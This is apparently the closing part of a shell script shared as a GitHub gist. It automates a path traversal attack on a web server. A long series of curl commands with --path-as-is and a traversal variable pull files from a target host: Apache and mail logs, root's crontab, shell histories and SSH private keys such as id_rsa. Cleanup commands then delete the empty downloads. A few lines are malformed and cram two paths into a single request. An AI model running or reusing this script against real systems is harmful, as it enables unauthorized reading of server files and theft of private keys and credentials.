curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache2/access_log -o ./var/log/apache2/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache2/access.log -o ./var/log/apache2/access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache2/error_log -o ./var/log/apache2/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache2/error.log -o ./var/log/apache2/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache/access_log -o ./var/log/apache/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache/access.log -o ./var/log/apache/access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache/error_log -o ./var/log/apache/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache/error.log -o ./var/log/apache/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache-ssl/access.log -o ./var/log/apache-ssl/access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/apache-ssl/error.log -o ./var/log/apache-ssl/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/auth.log -o ./var/log/auth.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/boot -o ./var/log/boot | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/htmp -o ./var/htmp | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/chttp.log -o ./var/log/chttp.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/cups/error.log -o ./var/log/cups/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/daemon.log -o ./var/log/daemon.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/debug -o ./var/log/debug | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/dmesg -o ./var/log/dmesg | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/dpkg.log -o ./var/log/dpkg.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/exim_mainlog -o ./var/log/exim_mainlog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/exim/mainlog -o ./var/log/exim/mainlog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/exim_paniclog -o ./var/log/exim_paniclog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/exim.paniclog -o ./var/log/exim.paniclog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/exim_rejectlog -o ./var/log/exim_rejectlog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/exim/rejectlog -o ./var/log/exim/rejectlog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/faillog -o ./var/log/faillog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/ftplog -o ./var/log/ftplog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/ftp-proxy -o ./var/log/ftp-proxy | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/ftp-proxy/ftp-proxy.log -o ./var/log/ftp-proxy/ftp-proxy.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/httpd/access_log -o ./var/log/httpd/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/httpd/access.log -o ./var/log/httpd/access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/httpd/error_log -o ./var/log/httpd/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/httpd/error.log -o ./var/log/httpd/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/httpsd/ssl.access_log -o ./var/log/httpsd/ssl.access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/httpsd/ssl_log -o ./var/log/httpsd/ssl_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/kern.log -o ./var/log/kern.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/lastlog -o ./var/log/lastlog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/lighttpd/access.log -o ./var/log/lighttpd/access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/lighttpd/error.log -o ./var/log/lighttpd/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/lighttpd/lighttpd.access.log -o ./var/log/lighttpd/lighttpd.access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/lighttpd/lighttpd.error.log -o ./var/log/lighttpd/lighttpd.error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/mail.info /var/log/mail.log -o ./var/log/mail.info /var/log/mail.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/maillog /var/log/mail.warn -o ./var/log/maillog /var/log/mail.warn | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/message /var/log/messages -o ./var/log/message /var/log/messages | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/mysqlderror.log -o ./var/log/mysqlderror.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/mysql.log -o ./var/log/mysql.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/mysql/mysql-bin.log -o ./var/log/mysql/mysql-bin.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/mysql/mysql.log -o ./var/log/mysql/mysql.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/mysql/mysql-slow.log -o ./var/log/mysql/mysql-slow.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/proftpd /var/log/pureftpd.log -o ./var/log/proftpd /var/log/pureftpd.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/pure-ftpd/pure-ftpd.log -o ./var/log/pure-ftpd/pure-ftpd.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/secure -o ./var/log/secure | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/vsftpd.log -o ./var/log/vsftpd.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/wtmp -o ./var/log/wtmp | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/xferlog -o ./var/log/xferlog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/log/yum.log -o ./var/log/yum.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/mysql.log -o ./var/mysql.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/run/utmp -o ./var/run/utmp | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/spool/cron/crontabs/root -o ./var/spool/cron/crontabs/root | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/webmin/miniserv.log -o ./var/webmin/miniserv.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/www/log/access_log -o ./var/www/log/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/www/log/error_log -o ./var/www/log/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/www/logs/access_log -o ./var/www/logs/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/www/logs/error_log -o ./var/www/logs/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/www/logs/access.log -o ./var/www/logs/access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/www/logs/error.log -o ./var/www/logs/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.atfp_history -o ./.atfp_history | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.bash_history -o ./.bash_history | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.bash_logout -o ./.bash_logout | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.bash_profile -o ./.bash_profile | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.bashrc -o ./.bashrc | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.gtkrc -o ./.gtkrc | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.login -o ./.login | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.logout -o ./.logout | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.mysql_history -o ./.mysql_history | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.nano_history -o ./.nano_history | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.php_history -o ./.php_history | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.profile -o ./.profile | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.ssh/authorized_keys -o ./.ssh/authorized_keys | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.ssh/id_dsa -o ./.ssh/id_dsa | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.ssh/id_dsa.pub -o ./.ssh/id_dsa.pub | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.ssh/id_rsa -o ./.ssh/id_rsa | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.ssh/id_rsa.pub -o ./.ssh/id_rsa.pub | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.ssh/identity -o ./.ssh/identity | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.ssh/identity.pub -o ./.ssh/identity.pub | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.viminfo -o ./.viminfo | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.wm_style -o ./.wm_style | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.Xdefaults -o ./.Xdefaults | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.xinitrc -o ./.xinitrc | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.Xresources -o ./.Xresources | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE~/.xsession -o ./.xsession | |
echo "Deleting empty files..." | |
find . -type f -size 14c -delete | |
echo "Deleting empty folders..." | |
find . -type d -empty -delete |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment